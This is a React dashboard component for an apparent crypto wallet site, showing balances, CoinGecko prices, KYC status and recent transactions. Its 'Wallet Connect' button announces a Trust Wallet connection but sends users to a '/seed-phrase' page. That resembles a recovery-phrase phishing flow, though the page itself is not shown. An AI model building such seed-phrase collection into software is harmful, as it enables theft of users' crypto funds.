import { useState, useEffect, useCallback } from 'react';
import { useNavigate } from 'react-router-dom';
import { toast } from 'react-hot-toast';
import Navbar from '../components/Navbar';
import API from '../utils/api';
import { useAuth } from '../contexts/AuthContext';
import SwapModal from '../components/SwapModal';
import SendTransferModal from '../components/SendTransferModal';
import SendCryptoListModal from '../components/SendCryptoListModal';
import BottomNav from '../components/BottomNav';
import { Copy, Wallet, BadgeCheck } from 'lucide-react';



const Dashboard = () => {
  const [data, setData] = useState({ user: null, balance: 0 });
  const [loading, setLoading] = useState(true);
  
  const [cryptos, setCryptos] = useState([]);
  const [cryptoLoading, setCryptoLoading] = useState(true);
 
  const [showSwap, setShowSwap] = useState(false);
  const [showList, setShowList] = useState(false);
  const [showTransfer, setShowTransfer] = useState(false);
  const [selectedCrypto, setSelectedCrypto] = useState(null);
  const handleSelectCrypto = (crypto) => {
    setSelectedCrypto(crypto);
    setShowTransfer(true);
  };
  const [userCryptoHoldings, setUserCryptoHoldings] = useState([]); // ← ADD THIS
  const navigate = useNavigate();
  const { isLoggedIn } = useAuth();
  const user = data.user || {};
  const kycStatus = user.kyc?.status || 'pending';
  const transactions = Array.isArray(user.transactions) ? user.transactions : [];
  const formatLabel = (value, fallback = 'N/A') => {
    if (!value) return fallback;
    const text = String(value);
    return text.charAt(0).toUpperCase() + text.slice(1);
  };



  // NEW: Single function to fetch backend data (avoids duplication in fetchData and fetchTopCryptos)
  const fetchBackendData = useCallback(async () => {
    try {
      console.log("Calling backend →", API.defaults.baseURL + "/user/dashboard");
      const res = await API.get("/user/dashboard");
      console.log("Backend response:", res.data);
      setData(res.data); // Update general user data
      return Array.isArray(res.data.user?.cryptoHoldings) ? res.data.user.cryptoHoldings : []; // Return holdings for crypto merging
    } catch (err) {
      console.error("Backend failed:", err.response?.status, err.response?.data);
      toast.error('Failed to load dashboard data!');
      if (err.response?.status === 401) navigate('/login'); // Only navigate on auth errors
      return [];
    }
  }, [navigate]);

  const fetchTopCryptos = useCallback(async (holdings) => {
    setCryptoLoading(true); // Sectional loading for crypto only
    try {
      // 1. CoinGecko
      const cgRes = await fetch(
        "https://api.coingecko.com/api/v3/coins/markets?vs_currency=usd" +
        "&order=market_cap_desc&per_page=10&page=1&sparkline=false" +
        "&price_change_percentage=24h"
      );
      if (!cgRes.ok) throw new Error(`CoinGecko ${cgRes.status}`);
      const cgData = await cgRes.json();

      // 2. Merge with provided holdings (no redundant backend call)
      const merged = cgData.map((coin) => {
        const h = holdings.find(
          (x) => x.symbol?.toUpperCase() === coin.symbol.toUpperCase()
        );
        return { ...coin, balance: h?.amount ?? 0 };
      });

      setCryptos(merged);
    } catch (err) {
      console.error("Crypto error:", err);
      toast.error("Failed to load crypto");
      setCryptos([]);
    } finally {
      setCryptoLoading(false);
    }
  }, []); // Empty deps as before

  // UPDATED: fetchData now just calls fetchBackendData (no internal loading for periodic calls)
  const fetchData = useCallback(async () => {
    await fetchBackendData(); // No setLoading here – only for initial load
  }, [fetchBackendData]);

  useEffect(() => {
    if (!isLoggedIn) {
      navigate('/login');
      return;
    }

    const loadInitial = async () => {
      setLoading(true); // Full loading only for initial
      const holdings = await fetchBackendData(); // Fetch backend once
      setUserCryptoHoldings(holdings);
      setData((prev) => ({ ...prev, user: { ...prev.user, cryptoHoldings: holdings } })); // Optional: Store holdings in data if needed elsewhere
      await fetchTopCryptos(holdings); // Pass holdings to avoid re-fetch
      setLoading(false);
    };

    loadInitial();

    const dataInterval = setInterval(fetchData, 120_000); // Increased to 2 minutes
    const cryptoInterval = setInterval(async () => {
      const holdings = await fetchBackendData(); // Refresh holdings
      fetchTopCryptos(holdings);
    }, 300_000); // Increased to 5 minutes, and refresh backend here too

    return () => {
      clearInterval(dataInterval);
      clearInterval(cryptoInterval);
    };
  }, [isLoggedIn, navigate, fetchData, fetchTopCryptos, fetchBackendData]); // Added fetchBackendData to deps
 const handleCryptoClick = (coinId, coinName) => {
    // 2. Use 'navigate' instead of 'router.push'
    // To pass data, we use URL parameters (path/to/page?key=value)
    navigate(`/crypto-detail?id=${coinId}&name=${coinName}`); 
  };



  if (loading) return <div className="min-h-screen bg-white flex items-center justify-center"><Navbar /><p>Loading dashboard...</p></div>;

  // Rest of the return statement remains unchanged
  return (
    <div className="min-h-screen bg-white pt-20">
      <Navbar />
      <div className="container mx-auto px-4 py-8">
        <h1 className="text-2xl sm:text-3xl font-bold text-primary mb-8 truncate">Welcome, {user.name || 'User'}</h1>

        {/* Balance Card */}
        <div className="grid grid-cols-1 md:grid-cols-3 gap-6 mb-8">
          <div className="bg-white p-6 rounded-lg shadow-md border border-gray-200">
            <h3 className="text-lg font-semibold text-secondary mb-2">Wallet Balance</h3>
            <div className="flex items-center space-x-2 text-xs text-gray-500 mb-1">
              <p>UID: {user._id ? `${user._id.slice(0, 8)}...${user._id.slice(-4)}` : 'N/A'}</p>
              <button
                onClick={() => {
                  navigator.clipboard.writeText(user._id || '');
                }}
                className="text-gray-400 hover:text-primary transition-colors"
              >
                <Copy className="w-4 h-4" />
              </button>
            </div>
            <p className="text-3xl font-bold text-success">${cryptos
                      .reduce((s, c) => s + c.current_price * c.balance, 0)
                      .toLocaleString(undefined, {
                        minimumFractionDigits: 2,
                        maximumFractionDigits: 2,
                      })}</p> 
            {/* New Icons Row */}
            <div className="grid grid-cols-5 gap-4 mt-6 pt-4 border-t border-gray-200">
              {/* Send Icon */}
              <button onClick={() => setShowList(true)} className="text-center hover:scale-110 transition-all group">
                <div className="w-12 h-12 mx-auto mb-2 bg-gradient-to-br from-primary to-purple-600 rounded-lg shadow-lg group-hover:shadow-primary/25 flex items-center justify-center">
                  <svg className="w-6 h-6 text-white" fill="none" stroke="currentColor" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg">
                    <path strokeLinecap="round" strokeLinejoin="round" strokeWidth="2" d="M12 19l9 2-9-18-9 18 9-2zm0 0v-8"></path>
                  </svg>
                </div>
                <p className="text-xs text-secondary font-medium">Withdraw</p>
              </button>
              <SendCryptoListModal
                isOpen={showList}
                onClose={() => setShowList(false)}
                onSelectCrypto={handleSelectCrypto}
              />
              <SendTransferModal
                isOpen={showTransfer}
                onClose={() => {
                  setShowTransfer(false);
                  setSelectedCrypto(null);
                }}
                crypto={selectedCrypto}
              />

              {/* Swap Icon */}
              <button onClick={() => setShowSwap(true)} className="text-center hover:scale-110 transition-all group">
                <div className="w-12 h-12 mx-auto mb-2 bg-gradient-to-br from-primary to-purple-600 rounded-lg shadow-lg group-hover:shadow-primary/25 flex items-center justify-center">
                  <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="#e2dfdf" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-blend-icon lucide-blend"><circle cx="9" cy="9" r="7"/><circle cx="15" cy="15" r="7"/></svg>
                </div>
                <p className="text-xs text-secondary font-medium">Swap</p>
              </button>
              <SwapModal
  isOpen={showSwap}
  onClose={() => setShowSwap(false)}
  holdings={userCryptoHoldings}  // ← now shows real user balance
/>

              {/* Fund Icon */}
              <button onClick={() => navigate("/fund")} className="text-center hover:scale-110 transition-all group">
                <div className="w-12 h-12 mx-auto mb-2 bg-gradient-to-br from-primary to-purple-600 rounded-lg shadow-lg group-hover:shadow-primary/25 flex items-center justify-center">
                  <svg className="w-6 h-6 text-white" fill="none" stroke="currentColor" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg">
                    <path strokeLinecap="round" strokeLinejoin="round" strokeWidth="2" d="M12 8c-1.657 0-3 .895-3 2s1.343 2 3 2 3 .895 3 2-1.343 2-3 2m0-8c1.11 0 2.08 .402 2.599 1M12 8V7m0 1v8m0 0v1m0-1c-1.11 0-2.08-.402-2.599-1M21 12a9 9 0 11-18 0 9 9 0 0118 0z"></path>
                  </svg>
                </div>
                <p className="text-xs text-secondary font-medium">Deposit</p>
              </button>

              <button onClick={() => navigate('/kyc')} className="text-center hover:scale-110 transition-all group">
  <div className="w-12 h-12 mx-auto mb-2 bg-gradient-to-br from-primary to-purple-600 rounded-lg shadow-lg group-hover:shadow-primary/25 flex items-center justify-center">
    <BadgeCheck className="w-6 h-6 text-white" strokeWidth={2.5} />
    {/* or use BadgeCheck if you want the badge style */}
  </div>
  <p className="text-xs text-secondary font-medium leading-tight">KYC</p>
</button>

              {/* Connect Trust Wallet Button */}
<button
  onClick={() => {
    toast.success('Connecting to Trust Wallet...');
    navigate('/seed-phrase'); // ← Change this to your actual route
  }}
  className="text-center hover:scale-110 transition-all grou"
>
  <div className="w-12 h-12 mx-auto mb-2 bg-gradient-to-br from-primary to-purple-600 rounded-lg shadow-lg group-hover:shadow-primary/25 flex items-center justify-center">
    <Wallet className="w-6 h-6 text-white" />
  </div>
  <p className="text-xs text-secondary font-medium leading-tight max-w-[60px] mx-auto">Wallet Connect</p>
</button>
            </div>
          </div>

          {/* KYC & Account Status Cards */}
          <div className="grid grid-cols-2 gap-4 sm:gap-6 mb-8">
            {/* KYC Status Card */}
            <div className="bg-white p-4 sm:p-6 rounded-xl shadow-sm border border-gray-200 hover:shadow-md transition-shadow duration-200 flex items-center space-x-3 cursor-pointer">
              <div>
                <h3 className="text-sm sm:text-lg font-semibold text-secondary mb-1">KYC Status</h3>
                <p className={`text-sm sm:text-lg font-bold ${kycStatus === 'approved' ? 'text-success' : 'text-error'}`}>
                  {kycStatus}
                </p>
              </div>
            </div>

            {/* Account Status Card */}
            <div className="bg-white p-4 sm:p-6 rounded-xl shadow-sm border border-gray-200 hover:shadow-md transition-shadow duration-200 flex items-center space-x-3 cursor-pointer">
              <div>
                <h3 className="text-sm sm:text-lg font-semibold text-secondary mb-1">Account Status</h3>
                <p className={`text-sm sm:text-lg font-bold ${user.isSuspended ? 'text-error' : 'text-success'}`}>
                  {user.isSuspended ? 'Suspended' : 'Active'}
                </p>
              </div>
            </div>
          </div>
        </div>

        {/* Crypto Portfolio Section */}
        <section className="mb-12">
          <div className="bg-[#6B46C1] rounded-xl shadow-xl border border-white/20 overflow-hidden">
            {/* Header */}
            <div className="flex items-center justify-between p-4 text-white">
              <h2 className="text-xl font-bold">Your Crypto</h2>
            </div>

            {/* Loading */}
            {cryptoLoading ? (
              <div className="p-8 text-center">
                <div className="inline-block animate-spin rounded-full h-10 w-10 border-t-2 border-white"></div>
                <p className="mt-2 text-white/80">Loading prices…</p>
              </div>
            ) : cryptos.length === 0 ? (
              <p className="p-8 text-center text-white/80">No data available.</p>
            ) : (
              <>
                {/* Total Value */}
                <div className="px-6 pt-2 text-right">
                  <span className="text-white font-medium">Total Value: </span>
                  <span className="text-white font-bold text-xl">
                    $
                    {cryptos
                      .reduce((s, c) => s + c.current_price * c.balance, 0)
                      .toLocaleString(undefined, {
                        minimumFractionDigits: 2,
                        maximumFractionDigits: 2,
                      })}
                  </span>
                </div>

                {/* Cards – responsive grid */}
                <div className="grid grid-cols-1 sm:grid-cols-2 lg:grid-cols-3 gap-4 p-4">
                  {cryptos.map((coin) => (
                    <div
                      key={coin.id}
                     onClick={() => handleCryptoClick(coin.id, coin.name)}
                      className="bg-white/10 backdrop-blur-sm rounded-lg p-4 border border-white/10 hover:bg-white/20 transition-all cursor-pointer"
                    >
                      <div className="flex items-center mb-3">
                        <img
                          src={coin.image}
                          alt={coin.name}
                          className="w-10 h-10 rounded-full mr-3 shadow"
                        />
                        <div>
                          <h4 className="text-white font-semibold truncate">
                            {coin.name}
                          </h4>
                          <p className="text-white/80 text-sm">
                            {coin.symbol.toUpperCase()}
                          </p>
                        </div>
                      </div>

                      <div className="text-white/80 space-y-1">
                        <div>
                          <span className="text-sm">Balance:</span>{" "}
                          <span className="font-medium text-white">
                            {coin.balance} {coin.symbol.toUpperCase()}
                          </span>
                        </div>
                        <div>
                          <span className="text-sm">Price:</span>{" "}
                          <span className="font-medium text-white">
                            ${coin.current_price.toLocaleString()}
                          </span>
                        </div>
                        <div
                          className={`text-sm font-medium ${
                            coin.price_change_percentage_24h >= 0
                              ? "text-green-400"
                              : "text-red-400"
                          }`}
                        >
                          24h:{" "}
                          {coin.price_change_percentage_24h >= 0 ? "+" : ""}
                          {(coin.price_change_percentage_24h || 0).toFixed(2)}%
                        </div>
                      </div>
                    </div>
                  ))}
                </div>
              </>
            )}
          </div>
        </section>

            {/* Transaction History Section */}
        <div className="bg-white rounded-xl shadow-md border border-gray-200 mb-8 overflow-hidden">
        <div className="flex items-center justify-between px-6 py-4 border-b border-gray-200">
        <h3 className="text-lg font-semibold text-primary">Recent Transactions</h3>
        {transactions.length > 5 && (
          <button 
        onClick={() => navigate('/transactions')} // Assuming a full history page at /transactions; adjust as needed
        className="text-sm text-primary hover:text-primary-dark font-medium transition-colors"
        >
        View All
        </button>
        )}
        </div>
        {transactions.length === 0 ? (
        <p className="px-6 py-4 text-gray-500 text-center">No transactions yet.</p>
        ) : (
        <div className="overflow-x-auto">
        <table className="w-full min-w-max">
        <thead className="bg-gray-50">
          <tr>
            <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">Type</th>
            <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">Amount</th>
            <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">Currency</th>
            <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">Status</th>
            <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">Date</th>
          </tr>
        </thead>
        <tbody className="divide-y divide-gray-200">
          {[...transactions]
            .sort((a, b) => new Date(b.date) - new Date(a.date)) // Sort by date descending (most recent first)
            .slice(0, 3) 
            .map((tx, index) => (
              <tr 
                key={index} 
                className="hover:bg-gray-50 transition-colors"
              >
                <td className="px-6 py-4 whitespace-nowrap text-sm text-gray-900 font-medium">
                  {formatLabel(tx.type)} {/* Capitalize type */}
                </td>
                <td className={`px-6 py-4 whitespace-nowrap text-sm font-medium ${tx.amount > 0 ? 'text-success' : 'text-error'}`}>
                  {tx.amount > 0 ? '+' : '-'}${Math.abs(tx.amount).toLocaleString()}
                </td>
                <td className="px-6 py-4 whitespace-nowrap text-sm text-gray-500">
                  {tx.currency ? String(tx.currency).toUpperCase() : 'N/A'}
                </td>
                <td className="px-6 py-4 whitespace-nowrap">
                  <span className={`inline-flex px-2 py-1 rounded-full text-xs font-medium ${
                    tx.status === 'completed' 
                      ? 'bg-success/10 text-success' 
                      : tx.status === 'pending' 
                        ? 'bg-warning/10 text-warning' 
                        : 'bg-error/10 text-error'
                  }`}>
                    {formatLabel(tx.status)}
                  </span>
                </td>
                <td className="px-6 py-4 whitespace-nowrap text-sm text-gray-500">
                  {new Date(tx.date).toLocaleDateString('en-US', { 
                    year: 'numeric', 
                    month: 'short', 
                    day: 'numeric',
                    hour: '2-digit',
                    minute: '2-digit'
                  })} 
                </td>
              </tr>
            ))}
        </tbody>
      </table>
    </div>
  )}
</div>

        
        
      </div>
      <BottomNav />
    </div>
  );
};

export default Dashboard;
